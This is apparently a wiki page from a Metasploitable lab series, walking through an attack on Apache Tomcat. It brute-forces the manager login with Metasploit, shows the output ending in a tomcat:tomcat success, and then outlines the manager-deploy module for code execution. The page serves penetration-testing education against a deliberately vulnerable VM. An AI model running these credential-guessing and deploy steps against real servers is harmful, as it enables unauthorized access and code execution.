Metasploitable/Apache/Tomcat and Coyote
From charlesreid1
Tomcat Service
We will attempt to abuse the Tomcat server in order to obtain access to the web server. The end goal is to obtain a shell on the web server.
Just a reminder of what the nmap scan returned about Apache Tomcat and Coyote:
10.0.0.27 8180 tcp http open Apache Tomcat/Coyote JSP engine 1.1
JSP stands for JavaServer Pages. All this means is, web pages accessed through port 8180 will be assembled by a Java web application.
What is tomcat
Apache Tomcat provides software to run Java applets in the browser. The nmap scan didn't return the version, so that's probably the first thing we'll want to figure out.
What is coyote
Coyote is a stand-alone web server that provides servlets to Tomcat applets. That is, it functions like the Apache web server, but for JavaServer Pages (JSP).
From the description of Coyote on the Tomcat page [1], it sounds like this server will be as susceptible to denial of service attacks as the Apache web server was.
Metasploit Modules for Tomcat
We can do a comprehensive search for all Tomcat-related modules in metasploit:
msf > search tomcat Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/admin/http/tomcat_administration normal Tomcat Administration Tool Default Access auxiliary/admin/http/tomcat_utf8_traversal normal Tomcat UTF-8 Directory Traversal Vulnerability auxiliary/admin/http/trendmicro_dlp_traversal normal TrendMicro Data Loss Prevention 5.5 Directory Traversal auxiliary/dos/http/apache_commons_fileupload_dos 2014-02-06 normal Apache Commons FileUpload and Apache Tomcat DoS auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 normal Apache Tomcat Transfer-Encoding Information Disclosure and DoS auxiliary/dos/http/hashcollision_dos 2011-12-28 normal Hashtable Collisions auxiliary/scanner/http/tomcat_enum normal Apache Tomcat User Enumeration auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual Apache Struts ClassLoader Manipulation Remote Code Execution exploit/multi/http/struts_default_action_mapper 2013-07-02 excellent Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution exploit/multi/http/struts_dev_mode 2012-01-06 excellent Apache Struts 2 Developer Mode OGNL Execution exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution exploit/multi/http/tomcat_mgr_upload 2009-11-09 excellent Apache Tomcat Manager Authenticated Upload Code Execution exploit/multi/http/zenworks_configuration_management_upload 2015-04-07 excellent Novell ZENworks Configuration Management Arbitrary File Upload post/windows/gather/enum_tomcat normal Windows Gather Apache Tomcat Enumeration
We will focus on three modules:
auxiliary/scanner/http/tomcat_mgr_login exploit/multi/http/tomcat_mgr_deploy exploit/multi/http/tomcat_mgr_upload
tomcat mgr login
This module is, obviously, for logging into Tomcat.
Here is info on this module from the Rapid7 website: https://www.rapid7.com/db/modules/auxiliary/scanner/http/tomcat_mgr_login
Printing out the various options, it looks like a brute force method:
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > show info
Name: Tomcat Application Manager Login Utility
Module: auxiliary/scanner/http/tomcat_mgr_login
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
MC <mc@metasploit.com>
Matteo Cantoni <goony@nothink.org>
jduck <jduck@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI /manager/html yes URI for Manager login. Default is /manager/html
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
Description:
This module simply attempts to login to a Tomcat Application Manager
instance using a specific user/pass.
References:
http://cvedetails.com/cve/2009-3843/
http://www.osvdb.org/60317
http://www.securityfocus.com/bid/37086
http://cvedetails.com/cve/2009-4189/
http://www.osvdb.org/60670
http://www.harmonysecurity.com/blog/2009/11/hp-operations-manager-backdoor-account.html
http://www.zerodayinitiative.com/advisories/ZDI-09-085
http://cvedetails.com/cve/2009-4188/
http://www.securityfocus.com/bid/38084
http://cvedetails.com/cve/2010-0557/
http://www-01.ibm.com/support/docview.wss?uid=swg21419179
http://cvedetails.com/cve/2010-4094/
http://www.zerodayinitiative.com/advisories/ZDI-10-214
http://cvedetails.com/cve/2009-3548/
http://www.osvdb.org/60176
http://www.securityfocus.com/bid/36954
http://tomcat.apache.org/
http://cvedetails.com/cve/1999-0502/
We'll definitely want to try blank passwords. Let's set some options:
msf auxiliary(tomcat_mgr_login) > workspace metasploitable [*] Workspace: metasploitable msf auxiliary(tomcat_mgr_login) > set BLANK_PASSWORDS true BLANK_PASSWORDS => true msf auxiliary(tomcat_mgr_login) > set RHOSTS 10.0.0.27 RHOSTS => 10.0.0.27 msf auxiliary(tomcat_mgr_login) > set USER_AS_PASS true USER_AS_PASS => true msf auxiliary(tomcat_mgr_login) > set RPORT 8180 RPORT => 8180
Now fire it up:
msf auxiliary(tomcat_mgr_login) > run msf auxiliary(tomcat_mgr_login) > run [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: admin:admin (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: admin: (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: admin:admin (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: admin:manager (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: admin:role1 (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: admin:root (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: admin:tomcat (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: admin:s3cret (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: manager:manager (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: manager: (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: manager:admin (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: manager:manager (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: manager:role1 (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: manager:root (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: manager:tomcat (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: manager:s3cret (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: role1:role1 (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: role1: (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: role1:admin (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: role1:manager (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: role1:role1 (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: role1:root (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: role1:tomcat (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: role1:s3cret (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: root:root (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: root: (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: root:admin (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: root:manager (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: root:role1 (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: root:root (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: root:tomcat (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: root:s3cret (Incorrect: ) [+] 10.0.0.27:8180 - LOGIN SUCCESSFUL: tomcat:tomcat [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: both:both (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: both: (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: both:admin (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: both:manager (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: both:role1 (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: both:root (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: both:tomcat (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: both:s3cret (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: j2deployer:j2deployer (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: cxsdk:kdsxc (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: root:owaspbwa (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: ADMIN:ADMIN (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: xampp:xampp (Incorrect: ) [-] 10.0.0.27:8180 TOMCAT_MGR - LOGIN FAILED: QCC:QLogic66 (Incorrect: ) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Success! The username/password tomcat/tomcat will get us access to the server.
tomcat mgr deploy
Let's see what this module requires:
msf > info exploit/multi/http/tomcat_mgr_deploy
Name: Apache Tomcat Manager Application Deployer Authenticated Code Execution
Module: exploit/multi/http/tomcat_mgr_deploy
Platform: Java, Linux, Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2009-11-09
Provided by:
jduck <jduck@metasploit.com>
Available targets:
Id Name
-- ----
0 Automatic
1 Java Universal
2 Windows Universal
3 Linux x86
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port
USERNAME no The username to authenticate as
VHOST no HTTP server virtual host
Payload information:
Description:
This module can be used to execute a payload on Apache Tomcat
servers that have an exposed "manager" application. The payload is
uploaded as a WAR archive containing a jsp application using a PUT
request. The manager application can also be abused using
/manager/html/upload, but that method is not implemented in this
module. NOTE: The compatible payload sets vary based on the selected
target. For example, you must select the Windows target to use
native Windows payloads.
Flags
 |
Metasploit any and all resources related to metasploit on this wiki
Category:Metasploit - pages labeled with the "Metasploit" category label MSF/Wordlists - wordlists that come bundled with Metasploit MSFVenom - msfvenom is used to craft payloads Meterpreter - the shell you'll have when you use MSF to craft a remote shell payload.
Category:Security · Category:Metasploit · Category:Kali
|
|
Metasploitable: The Red Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the RED TEAM's tools and routes of attack.
Exploiting MySQL with Metasploit: Metasploitable/MySQL Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres
Exploiting VSFTP Backdoor: Metasploitable/VSFTP SSH Penetration by Brute Force: Metasploitable/SSH/Brute Force SSH Penetration with Keys: Metasploitable/SSH/Keys SSH Penetration with Metasploit: Metasploitable/SSH/Exploits Brute-Forcing Exploiting NFS: Metasploitable/NFS Exploiting DNS Bind Server: Metasploitable/DNS Bind
Metasploitable Services: distcc: Metasploitable/distcc
Metasploitable Apache: Exploiting Apache (with Metasploit): Metasploitable/Apache Exploiting Apache (with Python): Metasploitable/Apache/Python Tor's Hammer DoS Attack: Metasploitable/TorsHammer * Apache DAV: Metasploitable/Apache/DAV * Apache Tomcat and Coyote: Metasploitable/Apache/Tomcat and Coyote
Metasploitable Memory: General approach to memory-based attacks: Metasploitable/Memory Investigating memory data: Metasploitable/Volatile Data Investigation Dumping Memory from Metasploit: Metasploitable/Dumping Memory
Metasploitable Fuzzing: (Have not done much work on fuzzing Metasploitable...)
Category:Security · Category:Metasploit · Category:Metasploitable · Category:Kali
|
|
Metasploitablue: The Blue Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the BLUE TEAM's methods for defending Metasploitable: defending against and responding to intrusions.
Hence the name, Metasploita-blue. Overview: Metasploitable/Defenses Metasploitable/Defenses/Stopping · Metasploitable/Defenses/Detecting
Metasploitable On-Machine Defenses: Linux Volatile Data System Investigation: Metasploitable/Volatile Data Investigation Linux Artifact Investigation: Metasploitable/Artifact Investigation Linux Iptables Essentials: Metasploitable/Iptables Firewall Assurance and Testing: Metasploitable/Firewall Password Assessment: Metasploitable/Password Assessment Standard Unix Ports: Unix/Ports
Netcat and Cryptcat (Blue Team): Metasploitable/Netcat and Metasploitable/Cryptcat Nmap (Blue Team): Metasploitable/Nmap Network Traffic Analysis: Metasploitable/Network Traffic Analysis Suspicious Traffic Patterns: Metasploitable/Suspicious Traffic Patterns Snort IDS: Metasploitable/Snort
|